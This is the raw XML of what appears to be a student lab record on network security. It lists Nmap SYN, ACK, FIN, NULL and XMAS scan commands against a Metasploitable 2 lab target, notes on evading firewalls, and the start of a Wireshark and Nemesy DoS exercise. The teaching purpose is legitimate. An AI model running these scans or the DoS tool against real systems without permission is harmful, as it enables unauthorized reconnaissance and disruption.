          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scans)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7999BA4E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198D4982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Aim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C49CDC7" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="448" w:right="445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use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Nmap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perform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different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port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scanning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techniques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such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as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ACK,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SYN,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FIN,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NULL, and XMAS scans on a target system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> determine port states and analyze network services running on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5454A7F3" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="47"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBC073E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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6EB9EE" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="204" w:line="415" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="555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Identify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2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Address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of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Target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Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DFA23A" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="8287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ifconfig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Note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down:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F387A" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000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=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1E067D02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79F683A6" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="133"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012573EA" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="647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Verify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Connectivity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Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DC8E2F" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="273" w:lineRule="exac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ping </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623EFD6D" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Successful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replies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connectivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E3D2E1" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F1DC540" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="6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SYN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Scan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(Stealth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Scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424F4FB" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="205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Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D6F4A9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sS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2974C911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00526A92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Performs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half-open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scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CF0AE6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Does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not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complete the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handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E20BAC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Fast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and </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>stealthy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE69FED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Port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Observed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299203CB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4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A83B2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Closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF2B1D9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Filtered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329D816A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5F7A8018" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="130"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524B2452" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7007"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206AF468" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7007"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79910895" w14:textId="27BD336F" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7007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ACK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Scan </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C034399" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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sA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-1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34452E02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5D02CC01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Used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detect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firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5934EE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Determines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whether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ports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filtered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or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unfiltered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C505DE3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Does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NOT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detect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open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ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E959F" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="202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Port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Observed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702ECB87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lastRenderedPageBreak/>
        <w:t>Filtered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E42E0EB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Unfiltered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BB8058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12379C2B" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="133"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A6EDC2F" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7007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FIN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Scan </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A01EA9E" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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sF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06926679" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="20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3971F6D7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Sends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FIN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without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establishing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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64176980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Bypasses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some</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72690627" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421DE88D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60"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Based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TCP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RFC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behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106F2FBC" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="205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Port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Observed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1486EFD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Open|Filtered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17AC4CA6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Closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48053699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0B0C7190" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="129"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776D5CF4" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="1" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7007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NULL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Scan </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3993ECF5" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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sN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7AF657A1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578CB984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Sends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no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TCP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flags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pacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB5EADF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Used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evade simple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filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0058C1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Port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Observed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A59EBF4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Open|Filtered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66BDFBFB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Closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2178AE44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0EDCD590" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7007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XMAS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Scan </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9A005" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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sX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2B7CCE30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6DFED044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b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sends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with </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FIN,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PSH,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URG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flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6388AFD2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Named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“XMAS”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because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flags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“lit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up”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCDF385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Port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States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Observed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3103DBD5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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Open|Filtered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C153BC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5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Closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A3A42D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01DE2C7E" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435D7E98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8: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Service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Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CE5620" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201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nmap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sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACAF05A" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F72DB95" w14:textId="70888D6D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Identifies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running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open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ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145EAB4A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60"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Helps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analyze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services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDE64A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16CE9551" w14:textId="77777777" w:rsidR="00EF1DA9" w:rsidRDefault="00EF1DA9" w:rsidP="0061574E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B6BC98" w14:textId="3EDF47B4" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr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lastRenderedPageBreak/>
        <w:t>Observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6DD216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SYN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scan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revealed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multiple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open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ports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system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762158AD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ACK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scan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indicated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firewall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filtering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behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7853D802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FIN,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NULL,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XMAS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scans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identified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ports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as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>open|filtered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4392CBF9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exposed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several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insecure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services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775F7D96" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr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61E366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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D75EE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1781F5F1" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201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Network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Capture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DoS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Attack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Analysis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Wireshark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3"/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Nemesy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FE4C3BE" w14:textId="74CF4088" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="145"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr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51E0270" wp14:editId="5B504EAA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>253793</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5733415" cy="2032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4AF0C" id="Group 31" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:20pt;width:451.45pt;height:1.6pt;z-index:-2516541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&#10;">
                <v:shape id="Graphic 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P3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YwTOH5Jf4AOX8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAQzez9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8r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 3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X0xQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUIvUnetRW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CtGnX0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3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6r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 3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8r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 3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ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3636448A" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:right="1305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capture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analyze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Wireshark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specific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network </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF026FE" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="159" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="1387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study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behavior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Denial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(DoS)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attack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4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Nemesy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 controlled laboratory environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A14B557" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="160" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="666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observe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impact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excessive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availability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performance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 target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2D72B8" w14:textId="41A680A4" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="99"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr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2E6B0A4" wp14:editId="57135819">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
